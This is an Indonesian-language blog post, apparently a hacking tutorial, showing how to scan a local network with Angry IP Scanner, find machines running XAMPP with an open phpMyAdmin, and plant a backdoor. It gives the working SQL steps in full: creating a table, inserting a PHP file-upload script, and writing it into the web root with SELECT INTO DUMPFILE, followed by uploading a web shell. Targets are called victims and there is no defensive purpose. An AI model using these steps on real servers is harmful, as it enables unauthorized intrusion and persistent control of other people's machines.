
Backdoor pada awalnya dibuat oleh para programer komputer sebagai mekanisme yang mengizinkan mereka untuk memperoleh akses khusus ke dalam program mereka, seringnya digunakan untuk membenarkan dan memperbaiki kode di dalam program yang mereka buat ketika sebuah crash akibat bug terjadi.
Oke singkat cerita kita akan langsung masuk inti penjelasannya, yang sesuai judul. Peralatan tambahan yang digunakann :
- Angry Ip Scanner
- Sedikit Script
- Shell Backdoor (Disini ane menggunkana shell 3CArmy)
Menu tools >>> Preferences >> Pada tab port tambahkan port yg akan kita scan
berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya sendiri dibuat begini :
Kemudian pada tab display pilih yang host with open port only
Selanjutnya balik lagi pada menu tool >>> Fetchers
Pindahkan web detect ke sebelah kiri seperti di gambar
oke , untuk setingan Anggry Ip Scanner nya selesai ...
Selanjutnya sebagai dasar untuk scann, disini ane menggunakan IP ane sendiri , misal IP ane 192.168.52.100 maka pada Angry Ip Scanner ane buat jadi seperti ini :
kemudian scan dan cari yg seperti ini :
yap .. yang port apachenya open tentunya , karna dari situlah kita masuk
NB : Tidak semua juga yang bisa , ada yg phpmyadminnya di password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo gak salah )
setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc )
oke , disini kita mulai bermain dengan comand sql nya ...
Pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan
create database userform
NB : userform adalah nama database yang dibuat
Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand :
CREATE TABLE `userform`.`user` (klik Go
`form` longtext not null
) ENGINE = MYISAM ;
NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang)
selanjutnya kita cek basedir nya dimana dengan comand :
select @@datadirpada contoh ini ada di C:\xampp\mysql\data\
artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs
oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini :
INSERT INTO `userform`.`user` (itu adalah script buat ngupload file backdoor kita nantinya ...
`form`
)
VALUES (
'<title>Upload File</title>
<style type="text/css">
<!--
body,td,th {
color: #0F0;
}
body {
background-color: #999;
}
-->
</style><p>
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<p>
<strong>
<?php
if ($_FILES[''file''] != '''') {
copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');
}else {
die(''Silahkan pilih file'');
}
?>
File berhasil diupload:<br />
Keterangan File:<br />
Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />
Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />
Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>
'
);
Jika sukses maka akan muncul seperti ini :
Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand :
select * into dumpfile 'C:/xampp/htdocs/upload.php' from userNB:
C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini )
upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya
from user = from (nama tabel)
Kemudian klik Go
Coba buka urlnya : victimip/upload.php
terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php
Maaf untuk beberapa step terakhir gak ada gambarnya dikarenakan target udah offline. Jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya...
0 comments:
Post a Comment